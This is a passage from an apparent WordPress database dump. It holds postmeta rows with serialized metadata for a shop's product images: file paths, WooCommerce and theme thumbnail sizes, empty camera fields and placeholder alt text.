:20:\"2018/02/slika1-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"slika1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"slika1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"slika1-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slika1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slika1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slika1-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"slika1-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"slika1-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"slika1-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"slika1-1-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"slika1-1-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"slika1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"slika1-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"slika1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2328,2773,'_wp_attachment_image_alt','a'),(2329,4341,'_wp_attachment_image_alt','a'),(2330,2774,'_wp_attached_file','2018/02/slika2.jpg'),(2331,2774,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika2.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika2-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika2-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2332,4342,'_wp_attached_file','2018/02/slika2-1.jpg'),(2333,4342,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:20:\"2018/02/slika2-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"slika2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"slika2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"slika2-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slika2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slika2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slika2-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"slika2-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"slika2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"slika2-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"slika2-1-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"slika2-1-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"slika2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"slika2-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"slika2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2334,2774,'_wp_attachment_image_alt','a'),(2335,4342,'_wp_attachment_image_alt','a'),(2336,2775,'_wp_attached_file','2018/02/slika3.jpg'),(2337,2775,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika3.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika3-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika3-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2338,4343,'_wp_attached_file','2018/02/slika3-1.jpg'),(2339,4343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:20:\"2018/02/slika3-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"slika3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"slika3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"slika3-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"slika3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"slika3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"slika3-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"slika3-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"slika3-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"slika3-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"slika3-1-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"slika3-1-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"slika3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"slika3-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"slika3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2340,2775,'_wp_attachment_image_alt','a'),(2341,4343,'_wp_attachment_image_alt','a'),(2342,2786,'_wp_attached_file','2018/02/slika4.jpg'),(2343,2786,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika4.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika4-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika4-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika4-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2344,2786,'_wp_attachment_image_alt','a'),(2345,2787,'_wp_attached_file','2018/02/slika5.jpg'),(2346,2787,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika5.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika5-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika5-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika5-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika5-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika5-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika5-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2347,2787,'_wp_attachment_image_alt','a'),(2348,2788,'_wp_attached_file','2018/02/slika6.jpg'),(2349,2788,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:950;s:4:\"file\";s:18:\"2018/02/slika6.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"slika6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"slika6-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slika6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slika6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"slika6-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"slika6-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"slika6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:18:\"slika6-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:18:\"slika6-950x550.jpg\";s:5:\"width\";i:950;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:18:\"slika6-550x950.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:950;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:18:\"slika6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"slika6-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"slika6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2350,2788,'_wp_attachment_image_alt','a'),(2351,2789,'_wp_attached_file','2018/02/slika7.jpg'),(2352,2789,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s